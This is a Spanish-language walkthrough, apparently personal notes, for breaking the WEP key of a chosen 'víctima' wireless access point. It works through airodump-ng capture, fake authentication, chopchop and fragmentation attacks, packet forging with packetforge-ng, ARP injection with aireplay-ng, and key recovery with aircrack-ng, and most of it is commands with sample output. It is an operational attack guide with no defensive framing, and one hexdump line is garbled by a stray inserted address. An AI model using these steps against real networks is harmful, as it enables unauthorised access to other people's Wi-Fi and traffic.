aircrack
(Las opciones que pongo entre comillas han de ir sin ellas al escribir
el comando)
a)
Terminal 1:
Levantar el interface y lanzar airodump. Las capturas se guardan en el
fichero "capt"
sudo ifconfig rausb0 up
sudo airodump-ng -w capt rausb0
(capt es el nombre del archivo con extensión .cap donde se almacenarán
las capturas)
Seleccionar una victima y volver a lanzar airodump en el canal de ésta:
sudo airodump-ng -w capt --channel "nº de canal victima" rausb0
b)
Terminal 2:
Autentificarse en el AP de la victima:
sudo aireplay-ng -1 0 -a "mac_victima" rausb0
00:06:15 Sending Authentication Request (Open System)
00:06:15 Authentication successful
00:06:15 Sending Association Request
00:06:15 Association successful :-)
c)
Terminal 3:
Lanzar ataque 4 y esperar a ver si el AP escupe algun paquete xor
sudo aireplay -4 -a "mac_victima" -h "mi_mac" rausb0
Cuando aparezca un paquete saldrá algo así:
Read 8 packets...
Size: 72, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:01:38:CF:91:BB
Dest. MAC = 01:00:5E:00:00:01
Source MAC = 00:01:38:CF:60:94
0x0000: 0842 0000 0100 5e00 0001 0001 38cf 91bb
B....^.....8...
0x0010: 0001 38cf 6094 8062 cc21 2200 1f62 b372
.8.`..b.!"..b.r
0x0020: 723b 5d37 4610 4fea b0da 6414 2d90 aaa3
r;]7F.O...d.-...
0x0030: a096 ab28 7832 c214 85bb 9c73 a4bb 5406
..(x2.....s..T.
0x0040: 4876 be5f 2826 68cd Hv._(&h.
Use this packet ?
Contestar "y"
Si no pilla un xor lanzar el ataque 5:
(si lo pilla pasar al punto d)
aireplay-ng -5 -b "mac_victima" -h "mi_mac" rausb0
0x0000: 0842 0000 0100 5e00 0001 0001 38ca baa7 .B....^.....8...
0x0010: 0001 38ca 345f 0047 8d6d 3600 4d18 2b8d
.8.4_.G.m6.M.+.
0x0020: 0e5f 3441 8aed 611c 86a6 e341 4acd 8709
_4A..a....AJ...
0x0030: dbef 4828 6440 a30a 95a1 79aa eafe 9ce4
.H(
[email protected].....
0x0040: 817e 106c 1db8 7717 .~.l..w.
Use this packet ? ( contestar "y" )
Saving chosen packet in replay_src-0101-001954.cap
00:20:44 Data packet found!
00:20:44 Sending fragmented packet
00:20:44 Got RELAYED packet!!
00:20:44 Trying to get 384 bytes of a keystream
00:20:44 Got RELAYED packet!!
00:20:44 Trying to get 1500 bytes of a keystream
00:20:44 Got RELAYED packet!!
Saving keystream in fragment-0101-002044.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes
keystream
d)
Ahora hay que crear un paquete para inyectar, usando el archivo
fragment....xor:
packetforge-ng -0 -a "mac_victima" -h "mi_mac" -k 192.168.1.100 -l
192.168.1.1 -y fragment-0101-002044.xor -w arp
Si está bien el comando saldra: Wrote packet to: arp
Las opciones -l y -k no sé si son necesarias
-y "nombre del paqute xorg guardado anteriormente"
-w "nombre que le vayamos a dar al paquete para inyectar"
e)
Ahora toca inyectar el paquete:
aireplay-ng -2 -r arp rausb0
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:01:38:CA:BA:A7
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:18:84:80:2C:A5
0x0000: 0841 0201 0001 38ca baa7 0018 8480 2ca5
A....8.......,.
0x0010: ffff ffff ffff 8001 a26d 3600 66e5 0fb1
........m6.f...
0x0020: 1a22 9b19 fceb b86f 1bec aa21 69f0 5fff
".....o...!i._.
0x0030: d2f8 af41 9e41 8b41 fe73 40df e1a5 3ac6
..A.A.A.s@...:.
0x0040: cc17 5784 ..W.
Use this packet ? ( Contestar "y" )
Saving chosen packet in replay_src-0101-002626.cap
Y los data en airodump empiezan a subir a toda velocidad.
f)
Cuando el número de paquetes ronde los 40.000 lanzamos desde otro
terminal:
aircrack-ng capt.cap
o bien
aircrack-ptw capt.cap
(En realidad el archivo de capturas tendrá la forma: capt-01.cap)
Si no pasa nada es que son aún pocos los paquetes capturados, esperamos
a que aumenten y se repite la operación hasta que escupa la clave wep.